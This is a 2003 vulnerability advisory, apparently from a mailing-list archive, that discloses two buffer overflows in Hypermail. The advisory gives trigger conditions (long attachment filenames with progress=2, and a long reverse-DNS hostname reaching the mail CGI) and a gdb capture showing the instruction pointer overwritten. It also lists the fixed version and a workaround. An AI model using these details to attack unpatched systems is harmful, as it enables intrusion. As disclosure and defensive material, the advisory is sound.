OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ulf Harnhammar (ulfh_at_update.uu.se)
Date: Sun Jan 26 2003 - 20:02:39 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hypermail buffer overflows

    PROGRAM: Hypermail
    HOMEPAGE: http://www.hypermail.org/
    SOURCEFORGE PAGE: http://sourceforge.net/projects/hypermail/
    VULNERABLE VERSIONS: 2.1.3, 2.1.4, 2.1.5, possibly others
    IMMUNE VERSIONS: 2.1.6

    DESCRIPTION:

    "Hypermail 2 is a much enhanced version of the popular tool that
    converts mails into nicely formatted HTML pages. Version 2 has a
    lot of new features including MIME support. Perfect for archiving
    mailing lists and similar."

    (direct quote from the program's project page at Freshmeat)

    SUMMARY:

    I have found one exploitable buffer overflow in Hypermail's main
    program, hypermail, and one in Hypermail's CGI program mail. The
    overflow in hypermail can be exploited by sending e-mails to the
    program, but it only works if hypermail is configured to use a
    certain option. The overflow in mail can be exploited by setting
    up a DNS server with evil data and then surfing to the CGI program
    in question.

    TECHNICAL DETAILS:

    a) hypermail

    The main program, hypermail, doesn't like the combination of long
    attachment filenames (252 characters) and the option progress set to
    2. This option gives verbose information about what directories and
    files are created, which is useful for new Hypermail administrators
    or people experiencing problems. I've attached a copy of a mailbox
    that causes this buffer overflow.

    How does it work? First the attachname variable in the parsemail
    function in parse.c is overrun. Then when the function print_progress
    is called, its bufstr variable is also overrun. As you can see
    on this session capture, the processor jumps to an address of the
    attacker's choice, so this is exploitable.

    $ cat /etc/redhat-release
    Red Hat Linux release 7.3 (Valhalla)
    $ uname -a
    Linux h130n1flsxxoxxx.telia.com 2.4.18-19.7.x #1 Thu Dec 12 09:00:42
    EST 2002 i686 unknown
    $ pwd
    /home/vsu/secwork/hypermail-2.1.5/src
    $ ./hypermail -o progress=2 -m /var/spool/mail/vsu
     Creating directory "vsu", mode 755.
    Loading mailbox "/var/spool/mail/vsu"...
     Creating directory "vsu//att-0000", mode 755.
       0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUU
    Segmentation fault
    $ rm -rf vsu
    $ gdb hypermail
    GNU gdb Red Hat Linux (5.2-2)
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and
    you are welcome to change it and/or distribute copies of it under
    certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for
    details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) r -o progress=2 -m /var/spool/mail/vsu
    Starting program: /home/vsu/secwork/hypermail-2.1.5/src/hypermail -o
    progress=2 -m /var/spool/mail/vsu
     Creating directory "vsu", mode 755.
    Loading mailbox "/var/spool/mail/vsu"...
     Creating directory "vsu//att-0000", mode 755.
       0 Created attachment file vsu//att-0000/01-UUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
    UUUUUUUUUUUUUUUUUUUUUU

    Program received signal SIGSEGV, Segmentation fault.
    0x55555555 in ?? ()
    (gdb) whe
    #0 0x55555555 in ?? ()
    Cannot access memory at address 0x55555555
    (gdb) i r
    eax 0x0 0
    ecx 0x0 0
    edx 0x0 0
    ebx 0x55555555 1431655765
    esp 0xbfffe870 0xbfffe870
    ebp 0x55555555 0x55555555
    esi 0x55555555 1431655765
    edi 0x55555555 1431655765
    eip 0x55555555 0x55555555
    eflags 0x10246 66118
    cs 0x23 35
    ss 0x2b 43
    ds 0x2b 43
    es 0x2b 43
    fs 0x0 0
    gs 0x0 0
    fctrl 0x37f 895
    fstat 0x0 0
    ftag 0xffff 65535
    fiseg 0x0 0
    fioff 0x0 0
    foseg 0x0 0
    fooff 0x0 0
    fop 0x0 0
    xmm0 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm1 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm2 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm3 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm4 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm5 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm6 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    xmm7 {f = {0x0, 0x0, 0x0, 0x0}}
    {f = {-nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff), -nan(0x7fffff)}}
    mxcsr 0x1f80 8064
    orig_eax 0xffffffff -1
    (gdb) q
    The program is running. Exit anyway? (y or n) y
    $

    There are also other buffer overruns in the parsemail function,
    including in the boundbuffer and the filename variables, but they
    don't seem to be exploitable.

    b) mail

    The CGI program mail does a reverse look-up of the user's IP number
    and uses strcpy to copy the resulting host name to a fixed-size
    buffer of 80 chars. If you set up a DNS server, where your IP number
    reverses to a host name of 122 chars, this is also exploitable.

    As this CGI program allows for any mail to be sent from anyone to
    anyone, it can also be abused by spammers.

    WORKAROUND:

    Set the option progress to something else than 2. Configure Hypermail
    not to use the CGI program mail, and then remove the mail program
    from your cgi-bin directory.

    SOLUTION:

    Upgrade to version 2.1.6, which fixes all the problems mentioned
    above.

    COMMUNICATION WITH VENDOR:

    The vendor was contacted on the 23rd of January. Version 2.1.6 was
    released on the 24th of January.

    // Ulf Harnhammar, VSU Security, ulfhupdate.uu.se
       lynx -source http://slashdot.org/ | head -n1 | tr YDC oHl | \
       sed -e 'y%PETO% wle%' -e 's% .*$%%' -e 's%L%d.%' -e 's%M%%' \
       -e 's% H%or%' -e 's%^..%%'